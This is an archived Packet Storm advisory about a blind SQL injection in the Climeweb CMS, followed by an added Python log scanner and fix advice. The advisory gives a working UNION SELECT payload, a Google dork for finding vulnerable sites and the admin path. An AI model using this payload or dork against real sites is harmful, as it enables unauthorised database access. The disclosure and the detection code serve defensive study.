Climeweb Remote SQL Injection

2011-10-17T00:00:00
ID PACKETSTORM:105908
Type packetstorm
Reporter poach3r
Modified 2011-10-17T00:00:00

Description

`==========================================================================  
  
# Exploit Title: Climeweb Blind SQL Injection Vulnerability  
# Date: 11.10.2011  
# Author: poach3r  
# Software Link: http://www.climeweb.com/  
# Tested on: Windows XP SP3  
# Google Dork: "Powered by Climeweb" inurl:"indux.php"  
  
==========================================================================  
  
# Exploit :  
  
http://127.0.0.1/path/indux.php?id=[SQL]  
  
http://127.0.0.1/path/newsdetails.php?News_Id=[SQL]  
  
# Demo :  
  
http://127.0.0.1/path/indux.php?id=-2+union+select+1,version(),3,4,5+admin--  
  
# Admin Page :  
  
http://127.0.0.1/path/admin/login.php  
  
==========================================================================  
  
# GreetZ To : All IRANIAN HackerZ  
  
./End  
`
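
Detection sketch for the two entry points listed above, as an added example that is not part of the original advisory: it scans web access logs for requests to `indux.php` and `newsdetails.php` whose `id` / `News_Id` value is not a plain integer. Assumptions: both parameters are meant to carry numeric ids, logs use the common/combined access log format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameter pairs named in the advisory (script names lowercased for matching).
WATCHED = {"indux.php": "id", "newsdetails.php": "News_Id"}
# Assumption: a legitimate value is a short non-negative integer.
INT_RE = re.compile(r"\d{1,10}")
# Request line inside a common/combined-format access log entry.
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_value(url):
    """Return (script, param, value) if a watched parameter is not an integer, else None."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    param = WATCHED.get(script)
    if param is None:
        return None
    # parse_qsl decodes %xx and '+', so encoded payloads are checked in clear form.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == param and not INT_RE.fullmatch(value):
            return (script, param, value)
    return None


def scan(lines):
    """Return (line_number, script, param, decoded_value) for every flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        hit = suspicious_value(m.group(1)) if m else None
        if hit:
            hits.append((n,) + hit)
    return hits


# Constructed sample log lines (documentation addresses, not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Oct/2011:10:00:01 +0000] "GET /path/indux.php?id=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [17/Oct/2011:10:00:07 +0000] "GET /path/indux.php?id=-2+union+select+1,version(),3,4,5+admin-- HTTP/1.1" 200 4988',
    '192.0.2.44 - - [17/Oct/2011:10:00:09 +0000] "GET /path/newsdetails.php?News_Id=7%27 HTTP/1.1" 500 312',
    '192.0.2.10 - - [17/Oct/2011:10:00:12 +0000] "GET /path/newsdetails.php?News_Id=7 HTTP/1.1" 200 2201',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule belongs in the application itself: casting the parameter to an integer or binding it in a prepared statement before it reaches the query removes the injection point, while the log check only shows who has been probing it.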